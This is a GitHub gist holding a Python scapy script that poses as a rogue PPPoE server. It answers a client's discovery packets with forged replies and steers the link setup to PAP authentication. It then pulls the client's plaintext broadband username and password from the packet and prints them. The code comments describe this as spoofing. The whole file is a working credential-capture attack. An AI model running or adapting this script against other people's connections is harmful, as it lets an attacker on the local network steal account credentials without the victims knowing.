Created
November 15, 2018 08:57
-
-
Save Admingyu/7d7d4158023a9bb1ac9ebe39f04cfc6b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# coding:utf-8 | |
''' | |
@author Karblue | |
@date 2016年2月27日 | |
''' | |
import struct | |
import uuid | |
import copy | |
import scapy.all as scapy | |
from scapy.layers.ppp import * | |
from psutil import net_if_addrs | |
MAC_ADDRESS = "0a:0a:0a:0a:0a:0a" | |
# 不适用于多网卡 | |
def get_mac_address(): | |
# mac = uuid.UUID(int=uuid.getnode()).hex[-12:] | |
# return ":".join([mac[e:e + 2] for e in range(0, 11, 2)]) | |
addrs = [] | |
for k, v in net_if_addrs().items(): | |
for item in v: | |
address = item[1] | |
if '-' in address and len(address) == 17: | |
addrs.append(address) | |
return addrs | |
class PPPoEServer(object): | |
def __init__(self): | |
self.clientMap = {} | |
# 开始监听 | |
def start(self): | |
scapy.sniff(lfilter=self.filterData) | |
# 过滤pppoe数据 | |
def filterData(self, raw): | |
if hasattr(raw, "type"): | |
_type2Method = { | |
# 发现阶段 | |
0x8863: { | |
"code": { | |
# PADI | |
0x09: (self.send_pado_packet, "PADI阶段开始,发送PADO..."), | |
# PADR | |
0x19: (self.send_pads_packet, "PADR阶段开始,发送PADS...") | |
} | |
}, | |
# 会话阶段 | |
0x8864: { | |
"proto": { | |
# LCP链路处理 | |
0xc021: (self.send_lcp_req, "欺骗成功,开始处理数据..."), | |
# PAP协议处理 | |
0xc023: (self.get_papinfo, "获取账号信息...") | |
} | |
} | |
} | |
if raw.type in _type2Method: | |
_nMethod = _type2Method[raw.type] | |
for k, v in _nMethod.items(): | |
_nVal = getattr(raw, k) | |
if _nVal in _nMethod[k]: | |
_nObj = _nMethod[k][_nVal] | |
print(_nObj[1]) | |
_nObj[0](raw) | |
# 处理lcp-req请求 | |
def send_lcp_req(self, raw): | |
if raw.load[0] == "\x01": | |
print("收到LCP-Config-Req") | |
# 第一次收到req 请求,直接拒绝 | |
if raw.src not in self.clientMap: | |
self.send_lcp_reject_packet(raw) | |
# self.send_lcp_reject_packet(raw) | |
self.send_lcp_req_packet(raw) | |
self.clientMap[raw.src] = {"req": 1, "ack": 0} | |
# 无论何时收到req,返回原始ack | |
self.send_lcp_ack_packet(raw) | |
print("发送LCP-Config-Ack") | |
# 解析pap账号密码 | |
def get_papinfo(self, raw): | |
# pap-req | |
if raw.load[0] == "\x01": | |
_payLoad = raw.load | |
_nUserLen = struct.unpack("!B", _payLoad[4])[0] | |
_nPassLen = struct.unpack("!B", _payLoad[5 + _nUserLen])[0] | |
_userName = _payLoad[5:5 + _nUserLen] | |
_passWord = _payLoad[6 + _nUserLen:6 + _nUserLen + _nPassLen] | |
print("get User:%s,Pass:%s" % (_userName, _passWord)) | |
self.send_pap_authreject(raw) | |
if raw.src in self.clientMap: | |
del self.clientMap[raw.src] | |
print("欺骗完毕....") | |
# 发送pap拒绝验证 | |
def send_pap_authreject(self, raw): | |
raw.dst, raw.src = raw.src, raw.dst | |
raw.load = "\x03\x02\x00\x06\x01\x00" | |
scapy.sendp(raw) | |
# 发送lcp-config-ack回执包 | |
def send_lcp_ack_packet(self, raw): | |
raw = copy.deepcopy(raw) | |
raw.dst, raw.src = raw.src, raw.dst | |
raw.load = "\x02" + raw.load[1:] | |
scapy.sendp(raw) | |
# 发送lcp-config-reject回执包 | |
def send_lcp_reject_packet(self, raw): | |
raw = copy.deepcopy(raw) | |
raw.dst, raw.src = raw.src, raw.dst | |
raw.load = "\x04" + raw.load[1:] | |
scapy.sendp(raw) | |
# 发送lcp-config-req回执包 | |
def send_lcp_req_packet(self, raw): | |
# 实际client payload | |
raw = copy.deepcopy(raw) | |
raw.dst, raw.src = raw.src, raw.dst | |
_rawnLoad = raw.load | |
# 插入PAP认证 | |
_payload = "\x01\x04\x05\xc8\x03\x04\xc0\x23\x05\x06\x5e\x63\x0a\xb8\x00\x00\x00\x00" | |
raw.load = "\x01\x01\x00" + chr(len(_payload)) + _payload | |
scapy.sendp(raw) | |
# 发送pa*系列包格式 | |
def send_pa_packet(self, raw, **kwargs): | |
raw.src, raw.dst = MAC_ADDRESS, raw.src | |
# 寻找客户端的Host_Uniq | |
_host_Uniq = self.padi_find_hostuniq(raw.load) | |
_payload = "\x01\x01\x00\x00\x01\x02\x00\x03^_^" | |
if _host_Uniq: | |
_payload += _host_Uniq | |
raw.len = len(_payload) | |
raw.load = _payload | |
for k, v in kwargs.items(): | |
setattr(raw, k, v) | |
scapy.sendp(raw) | |
# 发送lcp-termination会话终止包 | |
def send_lcp_end_packet(self, raw): | |
_pkt = Ether(src=raw.dst, dst=raw.src, type=0x8863) / PPPoE(version=0x1, type=0x1, code=0xA7, sessionid=0x01, | |
len=0) | |
scapy.sendp(_pkt) | |
# 发送PADS回执包 | |
def send_pads_packet(self, raw): | |
return self.send_pa_packet(raw, code=0x65, sessionid=0x01) | |
# 发送PADO回执包 | |
def send_pado_packet(self, raw): | |
return self.send_pa_packet(raw, code=0x07) | |
# 寻找客户端发送的Host-Uniq | |
def padi_find_hostuniq(self, raw): | |
_key = "\x01\x03" | |
if _key in raw: | |
_nIdx = raw.index(_key) | |
# 2字节host-uniq 长度 | |
_nLen = struct.unpack("!H", raw[_nIdx + 2:_nIdx + 4])[0] | |
# 2字节长度+剩余字节 | |
_nData = raw[_nIdx + 2:_nIdx + 4 + _nLen] | |
return _key + _nData | |
return | |
if __name__ == "__main__": | |
print(get_mac_address()) | |
macs = get_mac_address() | |
mac_dict = {} | |
i = 1 | |
for mac in macs: | |
mac_dict[i] = mac | |
print('网卡%d, MAC: %s' % (i, mac)) | |
i += 1 | |
i = input('输入连接的有线网卡序号') | |
MAC_ADDRESS = mac_dict[int(i)] | |
print('获取到网卡:', MAC_ADDRESS) | |
print('等待pppoe客户端连接...') | |
n = PPPoEServer() | |
n.start() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment